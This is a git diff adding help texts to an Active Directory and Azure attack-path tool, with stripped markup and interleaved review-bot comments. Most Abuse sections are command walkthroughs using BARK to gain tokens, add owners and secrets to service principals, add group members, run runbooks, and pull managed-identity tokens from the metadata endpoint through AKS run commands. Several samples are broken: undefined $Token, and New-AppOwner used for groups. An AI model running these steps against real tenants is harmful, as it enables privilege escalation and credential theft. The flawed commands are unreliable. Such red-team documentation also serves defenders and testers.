diff --git a/docs/data-analysis/edges.rst b/docs/data-analysis/edges.rst index 30e83edee..989731b48 100644 --- a/docs/data-analysis/edges.rst +++ b/docs/data-analysis/edges.rst @@ -257,6 +257,52 @@ References | +HasSIDHistory +^^^^^^^ + +The given source principal has, in its SIDHistory +attribute, the SID for the target principal. + +When a kerberos ticket is created for source principal, it will +include the SID for the target principal, and therefore grant +the source principal the same privileges and permissions as +the target principal. + + +Abuse Info +------------ + +No special actions are needed to abuse this, as the kerberos +tickets created will have all SIDs in the object's SID history +attribute added to them; however, if traversing a domain trust +boundary, ensure that SID filtering is not enforced, as SID +filtering will ignore any SIDs in the SID history portion of a +kerberos ticket. + +By default, SID filtering is not enabled for all domain trust +types. + +Opsec Considerations +-------------------- + +No opsec considerations apply to this edge. + +References +---------- + +* https://blog.harmj0y.net/redteaming/the-trustpocalypse/ +* https://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/ +* https://adsecurity.org/?p=1772 +* https://adsecurity.org/?tag=sidhistory +* https://attack.mitre.org/techniques/T1178/ +* https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/ + +| + +---- + +| + ForceChangePassword ^^^^^^^^^^^^^^^^^^^ 
@@ -2058,6 +2104,45 @@ References | +WriteAccountRestrictions +^^^^^^^ + +This edge indicates the principal has the ability to write to modify several properties on the target principal, most notably the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object. + +This clip demonstrates how to abuse this edge: + +.. raw:: html + +
+ You can use BARK's Invoke-AzureRMAKSRunCommand function + to execute commands on compute nodes associated with the + target AKS Managed Cluster. +
+ ++ This function requires you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to execute commands on the cluster. There are several ways to + acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+
+ + Now you can use BARK's Invoke-AzureRMAKSRunCommand function + to execute a command against the target AKS Managed Cluster. + For example, to run a simple "whoami" command: +
+ +
+
+ {
+ 'Invoke-AzureRMAKSRunCommand `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `\n' +
+ ' -Command "whoami"'
+ }
+
+
+
+ + If the AKS Cluster or its associated Virtual Machine Scale Sets + have managed identity assignments, you can use BARK's + Invoke-AzureRMAKSRunCommand function to retrieve a JWT for the + managed identity Service Principal like this: +
+ +
+
+ {
+ 'Invoke-AzureRMAKSRunCommand `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `\n' +
+ ' -Command \'curl -i -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://graph.microsoft.com/&api-version=2019-08-01"\''
+ }
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ > + ); +}; + +export default Abuse; \ No newline at end of file diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx new file mode 100644 index 000000000..bb2607789 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Azure Kubernetes Service Contributor role grants full control + of the target Azure Kubernetes Service Managed Cluster. This includes + the ability to remotely fetch administrator credentials for the cluster + as well as the ability to execute arbitrary commands on compute + nodes associated with the AKS Managed Cluster. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx new file mode 100644 index 000000000..457bae3bf --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can use BARK to add a new owner to the target object. The + BARK function you use will depend on the target object type, + but all of the functions follow a similar syntax. +
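Review bot: The Opsec text in AZAKSContributor/Opsec.jsx gives a defender nothing to look for; "Azure will create a log event for each abuse" names neither the log nor the operation. The run command used in this edge's Abuse text is a resource-manager operation, so it is recorded in the subscription's Azure Activity Log against the managed cluster; suggest `Each use of the AKS run command is a management-plane operation recorded in the subscription's Azure Activity Log for the target managed cluster.` The same byte-identical Opsec.jsx (blob 1d2ddcaf0) is also added for AZAutomationContributor, AZKeyVaultKVContributor and AZLogicAppContributor, where the relevant sources are the Activity Log for runbook creation/start, access-policy changes and workflow edits, and the Key Vault diagnostic (AuditEvent) log for the actual secret reads.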
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the principal that has the privilege to add a + new owner to your target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-GraphTokenWithRefreshToken to acquire an MS Graph-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$MGToken = Get-GraphTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + To add a new owner to a Service Principal, use BARK's + New-ServicePrincipalOwner function: +
+ +
+
+ {
+ 'New-ServicePrincipalOwner `\n' +
+ ' -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to an App Registration, use BARK's New-AppOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ >
+ );
+};
+
+export default Abuse;
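Review bot: The two command samples pass `-Token $Token`, but the only token variable defined in this file is `$MGToken` from the Get-GraphTokenWithRefreshToken sample above, so the examples do not run as written. Change both occurrences to `' -Token $MGToken'` (or `' -Token $MGToken.access_token'`, depending on what Get-GraphTokenWithRefreshToken returns; the client-credentials samples elsewhere in this commit use the `.access_token` form).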
diff --git a/src/components/Modals/HelpTexts/AZAddOwner/General.jsx b/src/components/Modals/HelpTexts/AZAddOwner/General.jsx
new file mode 100644
index 000000000..f76b99132
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZAddOwner/General.jsx
@@ -0,0 +1,31 @@
+import React from 'react';
+
+const General = () => {
+ return (
+ <>
+ + This edge is created during post-processing. It is created against + all App Registrations and Service Principals within the same tenant + when an Azure principal has one of the following Azure Active + Directory roles: +
+ ++
+ You will not see these privileges when auditing permissions against + any of the mentioned objects when you use Microsoft tooling, including + the Azure portal or any API. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx b/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx new file mode 100644 index 000000000..5f3080e26 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ Any time you add an owner to any Azure object, the AzureAD audit + logs will create an event logging who added an owner to what object, + as well as what the new owner added to the object was. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAddOwner/References.jsx b/src/components/Modals/HelpTexts/AZAddOwner/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAddOwner/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You can use BARK's New-AzureAutomationAccountRunBook and + Get-AzureAutomationAccountRunBookOutput functions to execute + arbitrary commands against the target Automation Account. +
+ ++ These functions require you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to add or modify and run Automation Account run books. There are + several ways to acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken ` \n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" ` \n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use BARK's New-AzureAutomationAccountRunBook function + to add a new runbook to the target Automation Account, specifying + a command to execute using the -Script parameter: +
+ +
+
+ {
+ 'New-AzureAutomationAccountRunBook `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -RunBookName "MyCoolRunBook" `\n' +
+ ' -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" `\n' +
+ ' -Script "whoami"'
+ }
+
+
+
+ + After adding the new runbook, you must execute it and fetch its + output. You can do this automatically with BARK's + Get-AzureAutomationAccountRunBookOutput function: +
+ +
+
+ {
+ 'Get-AzureAutomationAccountRunBookOutput `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -RunBookName "MyCoolRunBook" `\n' +
+ ' -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount"'
+ }
+
+
+
+ + If the Automation Account has a managed identity assignment, you can use + these two functions to retrieve a JWT for the service principal like this: +
+ +
+
+ {
+ '$Script = $tokenAuthURI = $env:MSI_ENDPOINT + "?resource=https://graph.microsoft.com/&api-version=2017-09-01"; $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI; $tokenResponse.access_token\n' +
+ 'New-AzureAutomationAccountRunBook -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" -Script $Script\n' +
+ 'Get-AzureAutomationAccountRunBookOutput -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount"'
+ }
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx new file mode 100644 index 000000000..48acc4c62 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx @@ -0,0 +1,14 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Azure Automation Contributor role grants full control + of the target Azure Automation Account. This includes + the ability to execute arbitrary commands on the Automation + Account. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx new file mode 100644 index 000000000..8e198b86d --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can read secrets and alter access policies (grant yourself access to read secrets) +
+ +Via PowerZure:
+ + Get-AzureKeyVaultContent + ++ The Key Vault Contributor role grants full control of the + target Key Vault. This includes the ability to read all secrets + stored on the Key Vault. +
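Review bot: The abuse described here ("alter access policies, grant yourself access to read secrets") only holds for vaults using the vault access policy permission model; for vaults on the Azure RBAC permission model, Key Vault Contributor manages the vault but cannot grant itself data-plane access, since that needs a role assignment the role does not permit. The General.jsx for this edge (the next file section) repeats the unconditional claim that the role includes the ability to read all secrets. Suggest qualifying both, e.g. `For vaults using the access policy permission model, you can grant yourself an access policy and then read secrets; vaults using the Azure RBAC permission model are not exposed by this role alone.`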
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx new file mode 100644 index 000000000..80bb89fa4 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx @@ -0,0 +1,25 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/{' '} + ++ Currently you need access to the portal GUI to execute this abuse. +
+ ++ The abuse involves adding or modifying an existing logic app to coerce + the logic app into sending a JWT for its managed identity service principal + to a web server you control. +
+ ++ You can see a full walkthrough for executing that abuse in this blog post: +
+ ++ + Andy Robbins - Managed Identity Attack Paths, Part 2: Logic Apps + +
+ + > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx new file mode 100644 index 000000000..d8723b6d5 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx @@ -0,0 +1,13 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Logic Contributor role grants full control + of the target Logic App. This includes the ability + to execute arbitrary commands on the Logic App. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
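Review bot: The General text names the role "Logic Contributor", but the Azure built-in role and this edge are both "Logic App Contributor"; the sentence should read `The Logic App Contributor role grants full control of the target Logic App.` "Execute arbitrary commands on the Logic App" also does not match the Abuse text for this edge, which describes editing the workflow so that the managed identity's token is sent elsewhere; `including the ability to modify its workflow definition` states the actual capability.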
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx new file mode 100644 index 000000000..74ce370ab --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can abuse this privilege using BARK's Add-AZMemberToGroup + function. +
+ ++ This function requires you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add principal to the target group. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK’s Add-AZMemberToGroup function to add a new principial + to the target group: +
+ +
+
+ {
+ 'Add-AZMemberToGroup `\n' +
+ ' -PrincipalID = "028362ca-90ae-41f2-ae9f-1a678cc17391" `\n' +
+ ' -TargetGroupId "b9801b7a-fcec-44e2-a21b-86cb7ec718e4" `\n' +
+ ' -Token $MGToken.access_token'
+ }
+
+
+
+ + Now you can re-authenticate as the principial you just added to the group + and continue your attack path, now having whatever privileges the target + group has. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx new file mode 100644 index 000000000..55fcdd612 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx @@ -0,0 +1,40 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + non role assignable Azure AD security groups when a Service + Principal has one of the following MS Graph app role assignments: +
+ ++ It is created against all Azure AD security groups, including those + that are role assignable, when a Service Principal has the following + MS Graph app role: +
+ ++ You will not see this privilege when using just the Azure portal + or any other Microsoft tooling. If you audit the roles and administrators + affecting any particular Azure security group, you will not see + that the Service Principal can add members to the group, but it + indeed can because of the parallel access management system used + by MS Graph. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx new file mode 100644 index 000000000..4aa533e4b --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx @@ -0,0 +1,14 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ The Azure activity log for the tenant will log who added what + principal to what group, including the date and time. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You can use BARK to add a new owner to the target object. The + BARK function you use will depend on the target object type, + but all of the functions follow a similar syntax. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add a new owner to the target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + To add a new owner to a Service Principal, use BARK's + New-ServicePrincipalOwner function: +
+ +
+
+ {
+ 'New-ServicePrincipalOwner `\n' +
+ ' -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to an App Registration, use BARK's New-AppOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to a Group, use BARK's New-GroupOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -GroupObjectId "352032bf-161d-4788-b77c-b6f935339770" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+ >
+ );
+};
+
+export default Abuse;
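Review bot: The last sample is introduced as BARK's New-GroupOwner function but the code string calls `New-AppOwner` with a `-GroupObjectId` parameter; the first line should be `'New-GroupOwner `\n' +`. All three samples in this file pass `-Token $Token`, while the token acquired above is `$MGToken` from Get-MSGraphTokenWithClientCredentials, which the other client-credentials samples in this commit pass as `$MGToken.access_token`; change each to `' -Token $MGToken.access_token'`.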
diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx
new file mode 100644
index 000000000..baa49f30a
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx
@@ -0,0 +1,65 @@
+import React from 'react';
+
+const General = () => {
+ return (
+ <>
+ + This edge is created during post-processing. It is created against + all App Registrations and Service Principals within the same tenant + when a Service Principal has the following MS Graph app role: +
+ ++
+ It is also created against all Azure Service Principals when a + Service Principal has the following MS Graph app role: +
+ ++
+ It is also created against all Azure security groups that are not + role eligible when a Service Principal has one of the following MS + Graph app roles: +
+ ++
+ Finally, it is created against all Azure security groups and all + Azure App Registrations when a Service Principal has the following + MS Graph app role: +
+ ++
+ You will not see these privileges when auditing permissions against + any of the mentioned objects when you use Microsoft tooling, including + the Azure portal and the MS Graph API itself. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx new file mode 100644 index 000000000..5f3080e26 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ Any time you add an owner to any Azure object, the AzureAD audit + logs will create an event logging who added an owner to what object, + as well as what the new owner added to the object was. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ There are several ways to perform this abuse, depending on what + sort of access you have to the credentials of the object that + holds this privilege against the target object. If you have an + interactive web browser session for the Azure portal, it is as + simple as finding the target App in the portal and adding a new + secret to the object using the “Certificates & secrets” tab. + Service Principals do not have this tab in the Azure portal but + you can add secrets to them with the MS Graph API. +
+ ++ No matter what kind of control you have, you will be able to + perform this abuse by using BARK’s New-AppRegSecret or + New-ServicePrincipalSecret functions. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add secrets to the target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK’s New-AppRegSecret to add a new secret to the + target application: +
+ +
+
+ {
+ 'New-AppRegSecret `\n' +
+ ' -AppRegObjectID "d878…" `\n' +
+ ' -Token $MGToken.access_token'
+ }
+
+
+
+ + The output will contain the plain-text secret you just created + for the target app: +
+ +
+
+ {
+ 'New-AppRegSecret `\n' +
+ ' -AppRegObjectID "d878…" `\n' +
+ ' -Token $MGToken.access_token\n' +
+ '\n' +
+ 'Name Value\n' +
+ '-----------------------------\n' +
+ 'AppRegSecretValue odg8Q~...\n' +
+ 'AppRegAppId 4d31…\n' +
+ 'AppRegObjectId d878…'
+ }
+
+
+
+ + With this plain text secret, you can now acquire tokens as the + service principal associated with the app. You can easily do + this with BARK’s Get-MSGraphToken function: +
+ +
+
+ {
+ '$SPToken = Get-MSGraphToken `\n' +
+ ' -ClientID "4d31…" `\n' +
+ ' -ClientSecret "odg8Q~..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use this JWT to perform actions against any other MS + Graph endpoint as the service principal, continuing your attack + path with the privileges of that service principal. +
+ > + ); +}; + +export default Abuse; \ No newline at end of file diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx new file mode 100644 index 000000000..667d9fe20 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx @@ -0,0 +1,31 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + all Azure App Registrations and Service Principals when a Service + Principal has one of the following MS Graph app roles: +
+ ++
+ You will not see this privilege when using just the Azure portal + or any other Microsoft tooling. If you audit the roles and administrators + affecting any particular Azure App or Service Principal, you will not see + that the Service Principal can add secrets to the object, but it + indeed can because of the parallel access management system used + by MS Graph. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx new file mode 100644 index 000000000..6fd8e62f2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ When you create a new secret for an App or Service Principal, + Azure creates an event called “Update application – Certificates + and secrets management”. This event describes who added the secret + to which application or service principal. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx new file mode 100644 index 000000000..0b9823d73 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..5ebdcbbc2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx new file mode 100644 index 000000000..af01ff83c --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
